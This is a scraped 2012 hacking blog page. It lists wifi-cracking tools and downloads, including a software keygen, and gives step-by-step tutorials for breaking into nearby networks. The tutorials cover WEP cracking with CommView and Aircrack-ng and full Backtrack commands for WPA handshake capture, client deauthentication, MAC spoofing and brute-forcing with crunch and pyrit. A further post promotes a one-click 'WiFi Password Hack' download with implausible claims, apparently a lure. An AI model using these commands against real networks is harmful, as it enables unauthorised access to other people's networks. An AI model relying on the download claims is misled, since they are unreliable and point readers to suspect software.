Easy Wifi Radar
SmartSniff
Ettercap
WinPcap
CommView

Windows Tools 2

Nmap
Wirelessmon
PocketWarrior
Inssider
RemoteAnyWhere
PmoniPacketMon
ApTools
WiFiFoFum
Advanced Port Scanner
NetSurveyor

Backtrack

BackTrack 4 Pre Release
BackTrack 4 Beta Release
BackTrack 3 VmWare Image
BackTrack 3
BackTrack 3 USB Version

PDFs & Tutorials

Hacking Wireless Networks
Cracking WEP and WPA WiFi
Wifi Hacking
Hacking Asus WL520gU
BackTrack PDFs
WiFi Advanced Fuzzing
Wifi Security
Wireless Sniffing WiresHark
Wireless Hacking Tools

Bonus Software

Net Tools
WepGen
Cantennator
Anchorfree
Cain and Abel
Wifi Drivers
Brutus
VmWare Keygen
LanHelper

Install
This is a portable version
Just Install the setup file

Download

If above methods can't works for you then you can also try these

Hack Wifi Password In Windows
Wifi Password Hack
How To Hack Into Computers Through WiFi

Hack Wifi Password In Windows

2012-11-22T06:30:00.000-08:00

In my previous posts i have written about Wifi Password Hackand also about How To Hack Into Computers Through WiFi. Today i have written this tutorial regarding windows wifi hacking technique.

FIRSTLY WE KNOW ABOUT HOW TO HACK WIFI PASSWORD AND WHAT TOOL ARE REQUIRED TO HACK WIFI PASSWORD
TOOL REQUIRED FOR WIFI HACKING:

1. COMMVIEW FOR WIFI :-

this tool is used for capturing the packet of wifi which we have to crack.this is also used for convert the file which is required for crack ( in this crack we convert .ncf file to .cap file)
you can use this link to download this software CLICK HERE
Link Pass: canuhack.blogspot.com

2. AIRCRACK -NG :-

this tool is used for retrieve password from captured file from commview for wifi software
to download software please CLICK HERE
Link Pass: canuhack.blogspot.com

STEP TO HACK WIFI NETWORK IN WINDOW:-

1. install commview
2. after installation a popup window is open in commview software for driver installation .( if pop window not open then goto > help > driver installation guide then do this)
3. install commview driver for your wifi network( without installation of driver you cannot capture data of desired wifi network)
4. after installation of driver click on capture button on left corner of software.
5. a pop up window is open and show wifi network near you.
6. select wifi network which you want to hack and click on capture.
you must need to see your connection is wep or not.(this trick only work with wep)
7. after that you can see the commview capture wifi data.
8. now goto to logging panel in commview and tick on auto saving and put
maximum directory size, mb – 2000
average log file size- 20
9. now capture packets for 2-3 hour.( about 1 lakh packet)

STEP TO CONVERT CAPTURED FILE.

open commview and follow step
1. goto file>log viewer
2. after open log viewer
3.goto file> load commview log> select all capture file > then open
4. after opening goto>export logs > select wireshark tcpdump format
5. save file with desired location (this file is used for cracking password)

CRACK PASSWORD USING AIRCRACK-NG:-

1. open download package.
2. goto bin and open aircrack-ng GUI.exe
3. open converted file
4. select key size – 64
5. click on launch
6. index no. of target file is– 1
7 wait for cracking password
8. if wifi password is cracked then it write
password 100% decrypted 94:13:26:54:66
in this password is 9413265466 for wifi
IF NOT CRACKED IN FIRST ATTEMPT
1. if password is not cracked then it say FAILED NEXT TRY WITH 5000 IVS.
2. so we have to again capture packets and repeat above process again till password is crack.
NOTE:- when we again capture packet and convert it into cap then we have to select all previous captured packet also to convert.
If you are not satisfied with this technique you may also check these
WiFi Hack AIO 2010
Hack WIFI Password With Backtrack 5
WEP Password Cracker: Wireless Network Hacking

Wifi Password Hack / How to hack wifi passwords / Hack wifi passwords

2012-11-22T06:20:00.000-08:00

In my previous posts i have written about Hack Wifi Password In Windowsand also about How To Hack Into Computers Through WiFi. Today i have written this tutorial regarding windows wifi hacking technique.

How to hack wifi password / Wifi password Hack

Hellow dear Visitators. Every one of us asked this question atleast once.How ca i hack wifi passwords for free Or how to hack wifi passwords.Well this is the answer that all of you expected.Our team of developers made a nice software after alot of hard work.This software was developed in around 6 month’s of hard work.Time that was necesary to test the cracking algorithm required to crack the security code of the wifii Networks.The software is coded in the most advance Programing language at this moment and will be regulary updated to meet the needs of our downloaders.In this post we will present you how the program works and how to use it ! The wifi password hack interface is user friendly and can be used even from a 10 years old kid.The need to acces wifi networks is wide because of the developing of smart phone’s and gadgets ho has acces to Wifi Networks.Our Team solved the problems that you encounter when you go in public places with wifi connection , but where the connection are password protected.Now with just a simple touch of a button you can get the password and navigate online without any problems.Then WiFi Password Hack is the right software for you. Our software it can hack any type of network encryption with the click of a button. WEP, WPA, WPA2 or whatever it is, it’s no match for WiFi Password Hack.Does this works ? It certainly does! WiFi Password Hack was put together by a group of qualified people. Call them hackers or whatever you like, but they know what they’re doing!

Is it really free?

Most definitely. The program comes to you at no cost! So what are you waiting for? Download WiFi Password Hack today and gain the ability to hack into any WiFi network you like!
Now watch the video proof posted Below !!!

Install Notes:

Step 1: Click on Download Button

Step 2 Run the application

Step 3: Enter SSID ( Wireless Name )

Step 4: Press “Get Password” button

Step 5: Wait to done the process

Step 6: Now login on hacked wireless with password

Before you download you can check Virus scan by clicking on the button below!

Virus Scan

Download the soft from here :

Click Here To Download

If you are not satisfied with this technique you may also check these

WiFi Hack AIO 2010

Hack WIFI Password With Backtrack 5

WEP Password Cracker: Wireless Network Hacking

Hack WIFI Password With Backtrack 5

2012-11-22T06:10:00.000-08:00

I have also posted other methods in my previous posts WEP Password Cracker and WiFi Hack AIO 2010 .
The Information Given Here Is Just For Educational Purpose. I am not responsible for any misuse of this knowledge.
WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.

Rules to Follow

A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
here a link to download it http://www.backtrack-linux.org/downloads/
A nearby WEP-enabled Wi-Fi network
Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Steps to Follow:

Step 1 :

airmon-ng

The result will be something like :

Interface Chipset Driver

wlan0        Intel
5100   iwlagn - [phy0]

Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down

macchanger
-m 00:11:22:33:44:55 mon0

ifconfig
mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid
ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
-w is the file to be written
--bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c
99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w
/pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz

cd
crunch-3.0

make

make
install

/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv |
aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface Chipset Driver

wlan0        Intel
5100   iwlagn - [phy0]

Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down

macchanger
-m 00:11:22:33:44:55 mon0

ifconfig
mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid
ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c
99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev
python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz

cd
crunch-3.0

make

make
install

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz

cd
pyrit-0.4.0

python
setup.py build

sudo
python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz

cd
cpyrit-cuda-0.4.0

python
setup.py build

sudo
python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst
mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b
ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit
--all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.com

This
code is distributed under the GNU General Public License v3+

Parsing
file 'new.cap' (1/1)...

Parsed
71 packets (71 802.11-packets), got 55 AP(s)

Tried
17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.
If above methods can't works for you then you can also try these
Hack Wifi Password In Windows
Wifi Password Hack
How To Hack Into Computers Through WiFi